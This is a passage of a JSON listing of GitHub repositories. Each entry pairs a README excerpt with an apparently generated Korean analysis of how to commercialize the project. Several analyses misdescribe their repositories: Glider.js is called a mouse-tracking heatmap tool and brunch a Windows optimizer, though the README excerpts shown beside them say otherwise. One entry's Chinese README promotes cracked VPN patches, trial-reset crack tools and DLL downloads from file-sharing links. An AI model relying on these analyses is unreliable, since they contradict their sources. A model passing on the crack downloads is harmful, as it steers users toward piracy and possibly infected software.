Windows](https://github.com/xtensor-stack/xtensor/actions/workflows/windows.yml/badge.svg)](https://github.com/xtensor-stack/xtensor/actions/workflows/windows.yml)\n[![Documentation](http://readthedocs.org/projects/xtensor/badge/?version=latest)](https://xtensor.readthedocs.io/en/latest/?badge=latest)\n[![Doxygen -> gh-pages](https://github.com/xtensor-stack/xtensor/workflows/gh-pages/badge.svg)](https://xtensor-stack.github.io/xtensor)\n[![Binder](https://mybinder.org/badge.svg)](https://mybinder.org/v2/gh/xtensor-stack/xtensor/stable?filepath=notebooks%2Fxtensor.ipynb)\n[![Zulip](https://img.shields.io/badge/social_chat-zuli","composite_score":0.0197,"license_safety_tag":"safe"},{"name":"YoulianBoshi/lantern-vpn","github_url":"https://github.com/YoulianBoshi/lantern-vpn","stars":8,"language":"","license":"unknown","abandonment_months":0,"description":"# Lantern VPN 저장소 분석\n\n## 왜 보물인가\n인터넷 접근이 제한된 지역의 사람들이 자유롭게 웹에 접속할 수 있도록 돕는 기술로, 전 세계 검열 회피 수요가 지속적으로 존재합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독형 VPN 앱 판매 (개인 사용자 대상 보안 서비스)\n2. **내부 업무 도구**: 기업의 원격근무 직","readme_excerpt":"**本项目长期更新，高封锁期永不失联，建议点击右上角“Star”给个星★收藏不迷路😂** [加入TG频道更多VPN](https://t.me/+P3IWwNkr3nY5MGFh)\n\n[缺少DLL文件下载吾爱破解大佬开发的VC++驱动补丁](https://www.lanzoul.com/iARSM265nfeb)\n\n**压缩包解压同一密码**\n\n```\nyoulianboshi\n```\n\n[2026/5/1快柠檬加速器无限重置白嫖，目前不用修改机器码，仅作为备用，运行重置工具即可，换新IP赠送10G流量，不换IP赠送2G流量，换新IP方法：用宽带则拔插网线重启路由器，用手机则开启飞行模式](https://rushlmo.org/s/acn01/ptijdns),[破解重置工具下载](https://www.lanzoup.com/iEJqy3ogly6f)\n\n<img width=\"1332\" height=\"1381\" alt=\"image\" src=\"https://github.com/user-attachments/assets/03128485-a3be-4fa4-82a1-0c1811abbf22\" />\n\n[2026/4/12无限白嫖VPN，每次重置ID获得一小时50G流量](https://t.me/c/3305349155/4678)\n\n<img width=\"500\" height=\"750\" alt=\"11\" src=\"https://github.com/user-attachments/assets/8828108d-3c6e-483c-b70b-c953fe8c3386\" />\n\n\n[2026/4/8火种VPN稳定快速，邀请码+绑定临时邮箱兑换积分可无限白嫖6天VIP时间,邀请码：1elwsxg](https://deeplink.huozhong.xyz/applyPromo/1elwsxg)，注册失败清空浏览器缓存和换IP，用宽带重启路由器，用手机WiFi打开飞行莫模式60秒即可解决问题[点击进入后台注册接口获取6天VPN试用](https://deeplink.huozhong.xyz/applyPromo/1elwsxg)\n\n[火种VPN客户端破解补丁](https://ylbs.lanzoul.com/ixC5d3g02u","composite_score":0.0196,"license_safety_tag":"unknown"},{"name":"yuanyuanxiang/SimpleRemoter","github_url":"https://github.com/yuanyuanxiang/SimpleRemoter","stars":8,"language":"C++","license":"unknown","abandonment_months":0,"description":"# SimpleRemoter 분석 보고서\n\n## 왜 보물인가\n스마트폰이나 컴퓨터로 다른 기기를 원격으로 제어할 수 있는 간단한 솔루션으로, 복잡한 설정 없이 누구나 쉽게 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기술 지원 서비스**: IT 담당자가 고객의 컴퓨터에 원격으로 접속해 문제를 해결해주는 유료 서비스\n2. **사무실 자동화 도구**","readme_excerpt":"# SimpleRemoter\n\n**[简体中文](./ReadMe.md) | [繁體中文](./ReadMe_TW.md) | [English](./ReadMe_EN.md)**\n\n<p align=\"center\">\n  <a href=\"https://github.com/yuanyuanxiang/SimpleRemoter/stargazers\">\n    <img src=\"https://img.shields.io/github/stars/yuanyuanxiang/SimpleRemoter?style=flat-square&logo=github\" alt=\"GitHub Stars\">\n  </a>\n  <a href=\"https://github.com/yuanyuanxiang/SimpleRemoter/network/members\">\n    <img src=\"https://img.shields.io/github/forks/yuanyuanxiang/SimpleRemoter?style=flat-square&logo=github\" alt=\"GitHub Forks\">\n  </a>\n  <a href=\"https://github.com/yuanyuanxiang/SimpleRemoter/releases\">\n    <img src=\"https://img.shields.io/github/v/release/yuanyuanxiang/SimpleRemoter?style=flat-square\" alt=\"GitHub Release\">\n  </a>\n  <img src=\"https://img.shields.io/badge/platform-Windows%20%7C%20Linux-blue?style=flat-square\" alt=\"Platform\">\n  <img src=\"https://img.shields.io/badge/language-C%2B%2B17-orange?style=flat-square&logo=cplusplus\" alt=\"Language\">\n  <img src=\"https://img.shields.io/badg","composite_score":0.0196,"license_safety_tag":"unknown"},{"name":"BuckleScript/bucklescript","github_url":"https://github.com/BuckleScript/bucklescript","stars":5,"language":"ReScript","license":"NOASSERTION","abandonment_months":0,"description":"# BuckleScript 상용화 분석\n\n## 왜 보물인가\n웹 개발을 더 안전하고 빠르게 만들어주는 기술로, 개발자들의 실수를 줄이고 개발 속도를 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 저코드 웹 애플리케이션 빌더로, 개발 경험이 없는 기업도 복잡한 웹 앱을 쉽게 만들 수 있는 플랫폼\n2. **내부 업무 도구**: 금","readme_excerpt":"<h1 align=\"center\">\n  <a href=\"https://rescript-lang.org/\">\n    ReScript\n  </a>\n</h1>\n\n<p align=\"center\">\n  <strong>Fast, Simple, Fully Typed JavaScript from the Future.</strong>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.org/package/rescript\"><img src=\"https://img.shields.io/npm/v/rescript?color=brightgreen&label=npm%20package\" alt=\"Current npm package version.\" /></a>\n  <a href=\"https://github.com/rescript-lang/rescript/actions\"><img src=\"https://github.com//rescript-lang/rescript/workflows/CI/badge.svg\" alt=\"Current Github Actions workflow status.\" /></a>\n  <a href=\"https://github.com/rescript-lang/rescript/blob/HEAD/LICENSE\"><img src=\"https://img.shields.io/badge/License-LGPL%20%2B%20MIT-blue.svg\" alt=\"ReScript uses both LGPL and MIT licenses.\" /></a>\n  <a href=\"https://x.com/intent/follow?screen_name=rescriptlang\"><img src=\"https://img.shields.io/badge/X-000000?style=flat&logo=x&logoColor=white\" alt=\"Follow @rescriptlang on X\" /></a>\n  <a href=\"https://bsky.app/profile/","composite_score":0.0195,"license_safety_tag":"unknown"},{"name":"NickPiscitelli/Glider.js","github_url":"https://github.com/NickPiscitelli/Glider.js","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":1,"description":"# Glider.js 분석 보고서\n\n## 왜 보물인가\n웹사이트에서 사용자의 마우스 움직임을 추적하고 시각화하는 기술로, 사용자 행동 분석이 필요한 모든 디지털 서비스의 핵심 도구가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 분석 플랫폼**\n- 웹사이트 방문자들이 어디를 보고 있는지 보여주는 히트맵 생성 서비스\n- 기업들이 자신의 홈페이","readme_excerpt":"# Glider.js\n\nLatest Version: 1.7.10\nA fast, light-weight, dependency free, responsive, accessible, extendable, native scrolling list with paging controls, methods and events. (< 2.8kb gzipped!)\n\nDemos and full documentation available on Github Pages: https://nickpiscitelli.github.io/Glider.js/\n\n##### Quick Start\n\nInclude glider.min.css:\n\n```html\n<link rel=\"stylesheet\" href=\"glider.min.css\">\nor\n<link rel=\"stylesheet\" href=\"https://cdn.jsdelivr.net/npm/glider-js@1/glider.min.css\">\n```\n\nInclude Glider.js:\n\n```html\n<script src=\"glider.min.js\"></script>\nor\n<script src=\"https://cdn.jsdelivr.net/npm/glider-js@1/glider.min.js\"></script>\n```\n\nExample HTML:\n\n```html\n<div class=\"glider\">\n  <div> 1 </div>\n  <div> 2 </div>\n  <div> 3 </div>\n  <div> 4 </div>\n  <div> 5 </div>\n  <div> 6 </div>\n</div>\n```\n\nGlider.js Initialization\n\n```javascript\nnew Glider(document.querySelector('.glider'));\n```\n\nGlider.js Initialization w/ full options:\n\n```javascript\nnew Glider(document.querySelector('.glider'), {\n\n  ","composite_score":0.0195,"license_safety_tag":"safe"},{"name":"isomorphic-git/isomorphic-git","github_url":"https://github.com/isomorphic-git/isomorphic-git","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"# isomorphic-git 분석 보고서\n\n## 왜 보물인가\n브라우저에서 직접 깃(버전 관리 프로그램)을 사용할 수 있게 만든 기술로, 설치 없이 웹 서비스 내에서 코드 관리를 가능하게 합니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 코드 편집 SaaS**: GitHub처럼 브라우저에서 완전히 작동하는 코드 편집 및 저장 서비스\n2. **교육 플랫폼","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://isomorphic-git.org/\" target=\"_blank\" rel=\"noopener\">\n    <picture>\n      <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://github.com/isomorphic-git/isomorphic-git/blob/main/.github/images/isomorphic-git-dark.svg?raw=true\" />\n      <source media=\"(prefers-color-scheme: light)\" srcset=\"https://github.com/isomorphic-git/isomorphic-git/blob/main/.github/images/isomorphic-git-light.svg?raw=true\" />\n      <img alt=\"Isomorphic Git logo\" src=\"https://github.com/isomorphic-git/isomorphic-git/blob/main/.github/images/isomorphic-git-light.svg?raw=true\" height=\"150\" />\n    </picture>\n  </a>\n</p>\n\n# isomorphic-git\n\n`isomorphic-git` is a pure JavaScript reimplementation of git that works in both Node.js and browser JavaScript environments. It can read and write to git repositories, fetch from and push to git remotes (such as GitHub), all without any native C++ module dependencies.\n\n## Goals\n\nIsomorphic-git aims for 100% interoperability with the cano","composite_score":0.0194,"license_safety_tag":"safe"},{"name":"tannerlinsley/react-virtual","github_url":"https://github.com/tannerlinsley/react-virtual","stars":9,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# react-virtual 분석 보고서\n\n## 왜 보물인가\n웹사이트에서 수천 개의 항목을 표시할 때도 빠르게 작동하도록 만들어주는 핵심 기술로, 대규모 데이터를 다루는 모든 웹서비스의 성능 문제를 해결합니다.\n\n## 어디에 쓸 수 있나\n\n**SaaS 서비스**: 주식 거래 플랫폼, 이메일 클라이언트, 구글 시트 같은 협업 도구에서 수만 개의 데이터를 부드","readme_excerpt":"<div align=\"center\">\n  <img src=\"./media/header_virtual.png\" alt=\"Tanstack Virtual\">\n</div>\n\n<br />\n\n<div align=\"center\">\n\t<a href=\"https://npmjs.com/package/@tanstack/virtual-core\" target=\"\\_parent\">\n  <img alt=\"npm downloads\" src=\"https://img.shields.io/npm/dm/@tanstack/virtual-core.svg\" />\n</a>\n\t<a href=\"https://github.com/tanstack/virtual\" target=\"\\_parent\">\n  <img alt=\"github stars\" src=\"https://img.shields.io/github/stars/tanstack/virtual.svg?style=social&label=Star\" />\n</a>\n<a href=\"https://bundlephobia.com/result?p=@tanstack/virtual-core@latest\" target=\"\\_parent\">\n  <img alt=\"bundle size\" src=\"https://badgen.net/bundlephobia/minzip/@tanstack/virtual-core@latest\" />\n</a>\n</div>\n\n<div align=\"center\">\n\t<a href=\"#badge\">\n    <img alt=\"semantic-release\" src=\"https://img.shields.io/badge/%20%20%F0%9F%93%A6%F0%9F%9A%80-semantic--release-e10079.svg\">\n  </a>\n\t<a href=\"https://bestofjs.org/projects/tanstack-virtual\">\n\t\t<img alt=\"Best of JS\" src=\"https://img.shields.io/endpoint?url=https:","composite_score":0.0194,"license_safety_tag":"safe"},{"name":"babel/babel-loader","github_url":"https://github.com/babel/babel-loader","stars":6,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# babel-loader 분석 보고서\n\n## 왜 보물인가\n웹사이트를 만들 때 최신 자바스크립트 코드를 구형 브라우저에서도 작동하도록 자동 변환해주는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 코드 에디터나 개발 교육 플랫폼에서 사용자 코드를 실시간으로 변환하는 기능\n2. **내부 업무 도구**: 대기업 개발팀의 웹 ","readme_excerpt":"> This README is for babel-loader v8/v9/v10 with Babel v7\n> If you are using legacy Babel v6, see the [7.x branch](https://github.com/babel/babel-loader/tree/7.x) docs\n\n[![NPM Status](https://img.shields.io/npm/v/babel-loader.svg?style=flat)](https://www.npmjs.com/package/babel-loader)\n[![codecov](https://codecov.io/gh/babel/babel-loader/branch/main/graph/badge.svg)](https://codecov.io/gh/babel/babel-loader)\n\n<div align=\"center\">\n  <a href=\"https://github.com/babel/babel\">\n    <img src=\"https://raw.githubusercontent.com/babel/logo/master/babel.svg\" alt=\"Babel logo\" width=\"200\" height=\"200\">\n  </a>\n  <a href=\"https://github.com/webpack/webpack\">\n    <img src=\"https://webpack.js.org/assets/icon-square-big.svg\" alt=\"webpack logo\" width=\"200\" height=\"200\">\n  </a>\n</div>\n\n<h1 align=\"center\">Babel Loader</h1>\n\nThis package allows transpiling JavaScript files using [Babel](https://github.com/babel/babel) together with [webpack](https://github.com/webpack/webpack) or [Rspack](https://github.co","composite_score":0.0194,"license_safety_tag":"safe"},{"name":"kaleidos-ventures/taiga-back","github_url":"https://github.com/kaleidos-ventures/taiga-back","stars":8,"language":"Python","license":"MPL-2.0","abandonment_months":1,"description":"# Taiga-Back 프로젝트 분석\n\n## 왜 보물인가\n팀 협업을 위한 프로젝트 관리 플랫폼의 핵심 기술로, 기업들이 업무를 체계적으로 진행하기 위해 필수적으로 사용하는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 팀 단위 프로젝트 관리 웹서비스로 구독료를 받으며 판매\n- **내부 업무 도구**: 회사 직원들이 자체 서버에 설치해 ","readme_excerpt":"## Taiga Backend\n\n[![Managed with Taiga.io](https://img.shields.io/badge/managed%20with-TAIGA.io-709f14.svg)](https://tree.taiga.io/project/taiga/ \"Managed with Taiga.io\")\n[![Tests Status](https://github.com/taigaio/taiga-back/workflows/Taiga%20Back%20-%20Test%20and%20Coverage/badge.svg?branch=main)](https://github.com/taigaio/taiga-back/actions?query=workflow%3A%22Taiga+Back+-+Test+and+Coverage%22 \"Tests Status\")\n[![Coverage Status](https://img.shields.io/coveralls/taigaio/taiga-back/main.svg)](https://coveralls.io/r/taigaio/taiga-back?branch=main \"Coverage Status\")\n\n## Documentation\n\nCurrently, we have authored three main documentation hubs:\n\n- **[API](https://docs.taiga.io/api.html)**: Our API documentation and reference for developing from Taiga API.\n- **[Documentation](https://docs.taiga.io/)**: If you need to install Taiga on your own server, this is the place to find some guides.\n- **[Taiga Resources](https://community.taiga.io/)**: This page is intended to be the support refere","composite_score":0.0193,"license_safety_tag":"unknown"},{"name":"jendrikseipp/vulture","github_url":"https://github.com/jendrikseipp/vulture","stars":7,"language":"Python","license":"mit","abandonment_months":1,"description":"# Vulture 저장소 분석\n\n## 왜 보물인가\n프로그래머들이 작성한 코드 중에서 실제로 사용되지 않는 불필요한 부분을 자동으로 찾아내는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 코드 정리 서비스로 기업들이 월 구독으로 코드 품질을 자동 점검\n2. **내부 업무 도구**: 소프트웨어 회사의 개발팀이 배포 전 불필요한 ","readme_excerpt":"# Vulture - Find dead code\n\n[![PyPI Version](https://img.shields.io/pypi/v/vulture.svg)](https://pypi.python.org/pypi/vulture)\n[![Conda Version](https://img.shields.io/conda/vn/conda-forge/vulture.svg)](https://anaconda.org/conda-forge/vulture)\n![CI:Test](https://github.com/jendrikseipp/vulture/workflows/CI/badge.svg)\n[![Codecov Badge](https://codecov.io/gh/jendrikseipp/vulture/branch/main/graphs/badge.svg)](https://codecov.io/gh/jendrikseipp/vulture?branch=main)\n\nVulture finds unused code in Python programs. This is useful for\ncleaning up and finding errors in large code bases. If you run Vulture\non both your library and test suite you can find untested code.\n\nDue to Python's dynamic nature, static code analyzers like Vulture are\nlikely to miss some dead code. Also, code that is only called implicitly\nmay be reported as unused. Nonetheless, Vulture can be a very helpful\ntool for higher code quality.\n\n## Features\n\n* fast: uses static code analysis\n* tested: tests itself and has complet","composite_score":0.0192,"license_safety_tag":"safe"},{"name":"andyholmes/gnome-shell-extension-gsconnect","github_url":"https://github.com/andyholmes/gnome-shell-extension-gsconnect","stars":5,"language":"JavaScript","license":"gpl-2.0","abandonment_months":1,"description":"# GNOME Shell Extension GSConnect 분석\n\n## 왜 보물인가\n안드로이드 폰과 리눅스 컴퓨터를 무선으로 연결해 문자, 알림, 파일을 자동으로 주고받을 수 있게 해주는 개인용 연동 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 IT 관리 솔루션**: 직원의 스마트폰과 업무용 리눅스 PC 간 문서·메시지 자동 동기화 서비스\n2. ","readme_excerpt":"<!--\nSPDX-FileCopyrightText: GSConnect Developers https://github.com/GSConnect\n\nSPDX-License-Identifier: GPL-2.0-or-later\n-->\n\n# GSConnect\n\n[<img src=\"https://raw.githubusercontent.com/andyholmes/gnome-shell-extensions-badge/master/get-it-on-ego.svg?sanitize=true\" alt=\"Get it on GNOME Extensions\" height=\"100\" align=\"middle\">][ego] [<img alt=\"Available in the Chrome Web Store\" src=\"https://raw.githubusercontent.com/GSConnect/gnome-shell-extension-gsconnect/main/data/images/chrome-badge.png\" align=\"middle\" hspace=\"12\"/>][chrome] [<img src=\"https://raw.githubusercontent.com/GSConnect/gnome-shell-extension-gsconnect/main/data/images/firefox-badge.png\" alt=\"Get the Add-On\" align=\"middle\">][firefox]\n\n## Overview\n\n[GSConnect][ego] is a complete implementation of [KDE Connect][kdeconnect]\nespecially for GNOME Shell with Nautilus, [Chrome][chrome] and\n[Firefox][firefox] integration. The KDE Connect team has applications for Linux,\nBSD, Android, Sailfish, iOS, macOS and Windows.\n\nWith GSConnect ","composite_score":0.0192,"license_safety_tag":"restricted"},{"name":"ejlchina/bean-searcher","github_url":"https://github.com/ejlchina/bean-searcher","stars":10,"language":"JavaScript","license":"apache-2.0","abandonment_months":1,"description":"# Bean Searcher 상용화 분석\n\n## 왜 보물인가\n데이터베이스에서 원하는 정보를 빠르고 쉽게 찾아주는 검색 도구로, 복잡한 기술 없이도 누구나 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소규모 기업의 고객 관리 시스템(CRM)에 통합하여 월 구독 형태로 판매\n2. **내부 업무 도구**: 대형 마트나 병원의 ","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://bs.zhxu.cn/\" target=\"_blank\">\n    <img width=\"128\" src=\"./assets/logo.png\" alt=\"logo\">\n  </a>\n</p>\n<p align=\"center\">\n  <a href=\"https://maven-badges.herokuapp.com/maven-central/com.ejlchina/bean-searcher/\"><img src=\"https://maven-badges.herokuapp.com/maven-central/com.ejlchina/bean-searcher/badge.svg\" alt=\"Maven Central\"></a>\n  <a href=\"https://gitee.com/troyzhxu/bean-searcher/blob/master/LICENSE\"><img src=\"https://img.shields.io/hexpm/l/plug.svg\" alt=\"License\"></a>\n  <a href=\"https://github.com/troyzhxu\"><img src=\"https://img.shields.io/badge/%E4%BD%9C%E8%80%85-troyzhxu-orange.svg\" alt=\"Troy.Zhou\"></a>\n</p>\n\nEnglish | [中文](./README.zh-CN.md)\n\n* Documentation：https://bs.zhxu.cn\n* **阿里云最低 1 折**：https://www.aliyun.com/minisite/goods?userCode=zugtbi5w\n* JueJin blogs：\n  - [Writing code like this is 100 times more efficient than using MyBatis directly!](https://juejin.cn/post/7027733039299952676)\n  - [What's the difference between Bean Searcher and MyB","composite_score":0.0192,"license_safety_tag":"safe"},{"name":"nickjj/docker-django-example","github_url":"https://github.com/nickjj/docker-django-example","stars":14,"language":"Python","license":"MIT","abandonment_months":0,"description":"# Docker를 활용한 Django 웹 애플리케이션 예제 분석\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 모든 설정과 구동 환경을 한 번에 준비할 수 있는 완성된 틀을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 기업을 위한 간단한 업무 관리 웹사이트나 고객 관계 관리 시스템\n2. **내부 업무 도구**: 회사 직원들이","readme_excerpt":"# 🐳 An example Django + Docker app\n\nYou could use this example app as a base for your new project or as a guide to\nDockerize your existing Django app.\n\nThe example app is minimal but it wires up a number of things you might use in\na real world Django app, but at the same time it's not loaded up with a million\npersonal opinions.\n\nFor the Docker bits, everything included is an accumulation of [Docker best\npractices](https://nickjanetakis.com/blog/best-practices-around-production-ready-web-apps-with-docker-compose)\nbased on building and deploying dozens of assorted Dockerized web apps since\nlate 2014.\n\n**This app is using Django 6.0.5 and Python 3.14.5**. The screenshot shows\n`X.X.X` since they get updated regularly:\n\n[![Screenshot](.github/docs/screenshot.jpg)](https://github.com/nickjj/docker-django-example/blob/main/.github/docs/screenshot.jpg?raw=true)\n\n## 🧾 Table of contents\n\n- [Tech stack](#tech-stack)\n- [Notable opinions and extensions](#notable-opinions-and-extensions)\n- [Running ","composite_score":0.0192,"license_safety_tag":"safe"},{"name":"rcmaehl/WhyNotWin11","github_url":"https://github.com/rcmaehl/WhyNotWin11","stars":45,"language":"AutoIt","license":"LGPL-3.0","abandonment_months":0,"description":"# WhyNotWin11 분석 리포트\n\n## 왜 보물인가\nWindows 11 설치 가능 여부를 미리 확인해주는 도구로, 수백만 PC 사용자들이 업그레이드 전에 자신의 컴퓨터가 호환되는지 간단히 알아볼 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 웹 서비스**: PC 사양을 입력하면 Windows 11 호환성을 온라인에서 즉시 판단해주는 진단 ","readme_excerpt":"[![Build Status](https://img.shields.io/github/actions/workflow/status/rcmaehl/WhyNotWin11/wnw11.yml?branch=main)](https://github.com/rcmaehl/WhyNotWin11/actions?query=workflow%3AWNW11)\n[![Download](https://img.shields.io/github/v/release/rcmaehl/WhyNotWin11)](https://github.com/rcmaehl/WhyNotWin11/releases/latest/)\n[![Download count)](https://img.shields.io/github/downloads/rcmaehl/whynotwin11/total?label=Downloads)](https://github.com/rcmaehl/WhyNotWin11/releases/latest/)\n[![Ko-fi](https://img.shields.io/badge/Support%20me%20on-Ko--fi-FF5E5B.svg?logo=ko-fi)](https://ko-fi.com/rcmaehl)\n[![PayPal](https://img.shields.io/badge/Donate%20on-PayPal-00457C.svg?logo=paypal)](https://www.paypal.com/donate/?hosted_button_id=YL5HFNEJAAMTL)\n[![Join the Discord chat](https://img.shields.io/badge/Discord-chat-7289da.svg?&logo=discord)](https://discord.gg/uBnBcBx)\n[![My Twitter](https://img.shields.io/badge/twitter-545454.svg?logo=twitter)](https://twitter.com/WhyNotWin11)\n\n# WhyNotWin11\nDetection ","composite_score":0.0191,"license_safety_tag":"restricted"},{"name":"junh0328/prepare_frontend_interview","github_url":"https://github.com/junh0328/prepare_frontend_interview","stars":16,"language":"JavaScript","license":"unknown","abandonment_months":0,"description":"# prepare_frontend_interview 분석\n\n## 왜 보물인가\n웹 개발자가 취업 면접을 준비할 때 자주 나오는 질문들을 한곳에 모아둔 학습 자료로, 면접 준비 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼 (SaaS)**: 코딩 부트캠프나 취업 준비 교육 사이트에서 면접 준비 과정으로 구독 서비스화","readme_excerpt":"# prepare_frontend_interview (2025-11-11)\n\n<b>프론트엔드 기술 면접을 위한 핸드북 만들기</b>\n\n면접의 인터뷰어 분들이 JS의 수 많은 개념들을 순서대로 질문을 하지는 않습니다.\n\n하지만 자바스크립트의 연관되어 있는 개념들을 순서대로 나열하고 핸드북 형식으로 보다 보면,\n\n모르는 개념을 파악하고 한눈에 보는 것에 있어서 도움이 되지 않을까 싶어 제작하게 되었습니다.\n\n크게 ① CS ② HTML/CSS ③ JavaScript 로 나누었습니다\n\n① CS인 computer science에는 자바스크립트 이외에 지식들에 대한 조금 잡다한 내용이 담길 예정입니다\n\n목차를 보고 해당 내용이 마음에 드실 경우에 보시는 것을 추천합니다!\n\n## 질문의 빈도\n\n```\n① JS > ② CS > ③ React > ④ HTML/CSS\n```\n\n## 📚 학습 가이드\n\n### <a href=\"./prompt_engineering.md\">프롬프트 엔지니어링 가이드 (2025-11-11)</a>\n\nCLAUDE CODE와 협업하여 이 핸드북을 개선한 실제 과정을 담은 가이드입니다.\n\n- ✅ 프롬프트 엔지니어링 기초\n- ✅ 실제 프로젝트 단계별 분석 (js.md 고도화 사례)\n- ✅ 핵심 전략 5가지\n- ✅ 실전 팁 7가지\n- ✅ 시나리오별 프롬프트 예시\n- ✅ 시간 절감 효과: 77-88%\n\n**대상**: 프롬프트 엔지니어링을 처음 접하는 개발자\n**난이도**: 초급 ~ 중급\n**소요 시간**: 약 20-30분\n\n> 💡 AI를 활용한 문서 작업, 코드 리뷰, 리팩토링 등에 관심 있는 분들께 추천합니다!\n\n## contribute\n\n### 개발 환경 설정\n\n**필수 도구**: Node.js v22 이상, pnpm\n\n```bash\n# ① 클론 받기 / 포크 받기\n$ git clone https://github.com/junh0328/prepare_frontend_interview.git\n$ cd prepare_frontend_interview\n\n# ② 의존","composite_score":0.0191,"license_safety_tag":"unknown"},{"name":"microsoft/fast-blazor","github_url":"https://github.com/microsoft/fast-blazor","stars":13,"language":"C#","license":"MIT","abandonment_months":0,"description":"# microsoft/fast-blazor 분석\n\n## 왜 보물인가\n마이크로소프트가 만든 프로젝트로, 웹 애플리케이션을 빠르고 쉽게 개발할 수 있도록 도와주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 업무 관리 SaaS**: 직원 일정관리, 프로젝트 추적 등 내부 업무용 웹 서비스\n2. **금융사의 내부 시스템**: 은행이나 보험사의 거래 기","readme_excerpt":"# Microsoft Fluent UI Blazor library\n\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)\n[![.NET C#](https://img.shields.io/badge/.NET-C%23-blue)](https://docs.microsoft.com/en-us/dotnet/csharp/)\n[![NuGet](https://img.shields.io/nuget/v/Microsoft.FluentUI.AspNetCore.Components?label=NuGet%20Component%20Library)](https://www.nuget.org/packages/Microsoft.FluentUI.AspNetCore.Components)\n[![NuGet](https://img.shields.io/nuget/v/Microsoft.FluentUI.AspNetCore.Templates?label=NuGet%20Templates)](https://www.nuget.org/packages/Microsoft.FluentUI.AspNetCore.Templates)\n[![Discord](https://img.shields.io/badge/chat%20on-discord-7289da.svg)](https://discord.gg/M5cBTfp6J2)\n\n<!--\n[![Validate Security](https://github.com/microsoft/fluentui-blazor/actions/workflows/codeql-analysis.yml/badge.svg)](https://github.com/microsoft/fluentui-blazor/actions/workflows/codeql-analysis.yml)\n-->\n\n> ## Reporting an issue?\n> Please supply us with **ready-to-ru","composite_score":0.019,"license_safety_tag":"safe"},{"name":"pl3xgaming/Purpur","github_url":"https://github.com/pl3xgaming/Purpur","stars":5,"language":"Java","license":"MIT","abandonment_months":0,"description":"# Purpur 저장소 분석\n\n## 왜 보물인가\n마인크래프트 게임 서버를 더 빠르고 안정적으로 운영할 수 있게 해주는 오픈소스 프로젝트로, 게임 서버 운영자들 사이에서 수요가 높습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 서버 호스팅 SaaS**: 마인크래프트 서버 렌탈 회사가 Purpur를 기반으로 더 저렴하고 빠른 호스팅 서비스 제공\n2. **게임","readme_excerpt":"<div align=\"center\">\n\n<a href=\"https://purpurmc.org\">\n  <img src=\"https://user-images.githubusercontent.com/74448585/150906023-101cd383-da82-4a3c-9603-a3b5741c3994.png\" alt=\"Purpur\">\n</a>\n\n## Purpur\n\n[![MIT License](https://img.shields.io/github/license/PurpurMC/Purpur?&logo=github)](LICENSE)\n[![Build Status](https://img.shields.io/github/actions/workflow/status/PurpurMC/Purpur/build.yml?branch=ver%2F26.1.2&event=push&logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABhWlDQ1BJQ0MgcHJvZmlsZQAAKJF9kT1Iw0AcxV9bxSIVh1YQcYhQnSyIiuimVShChVArtOpgcukXNGlIUlwcBdeCgx+LVQcXZ10dXAVB8APE0clJ0UVK/F9SaBHjwXE/3t173L0D/PUyU82OMUDVLCOViAuZ7KrQ9YogwujDEGYkZupzopiE5/i6h4+vdzGe5X3uz9Gj5EwG+ATiWaYbFvEG8dSmpXPeJ46woqQQnxOPGnRB4keuyy6/cS447OeZESOdmieOEAuFNpbbmBUNlXiSOKqoGuX7My4rnLc4q+Uqa96TvzCU01aWuU5zEAksYgkiBMioooQyLMRo1UgxkaL9uId/wPGL5JLJVQIjxwIqUCE5fvA/+N2tmZ8Yd5NCcaDzxbY/hoGuXaBRs+3vY9tunACBZ+BKa/krdWD6k/RaS4seAb3bwMV1S5P3gMsdoP9JlwzJkQI0/fk88H5G35QFwrdA95rbW3Mfpw9AmrpK3gAHh8BIgbL","composite_score":0.019,"license_safety_tag":"safe"},{"name":"sebanc/brunch","github_url":"https://github.com/sebanc/brunch","stars":5,"language":"","license":"GPL-3.0","abandonment_months":0,"description":"# sebanc/brunch 분석 보고서\n\n## 왜 보물인가\n이 프로젝트는 Windows 컴퓨터를 더 빠르고 가볍게 만드는 최적화 도구로, 일반 사용자들이 느리고 답답한 윈도우를 개선하고 싶을 때 바로 사용할 수 있는 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중고 컴퓨터 판매업체가 납품 전 PC 최적화 서비스로 제공하여","readme_excerpt":"<div id=\"top\"></div>\n\n<!-- Shields/Logos -->\n[![License][license-shield]][license-url]\n[![Issues][issues-shield]][issues-url]\n[![Discord][discord-shield]][discord-url]\n\n<!-- Project Logo -->\n<p align=\"center\">\n  <a href=\"https://github.com/sebanc/brunch\" title=\"Brunch\">\n   <img src=\"./Images/decon_icon-512.png\" width=\"128px\" alt=\"Logo\"/>\n  </a>\n</p>\n<h1 align=\"center\">Brunch Framework</h1>\n\n<!-- Special Thanks -->\n\n## Special 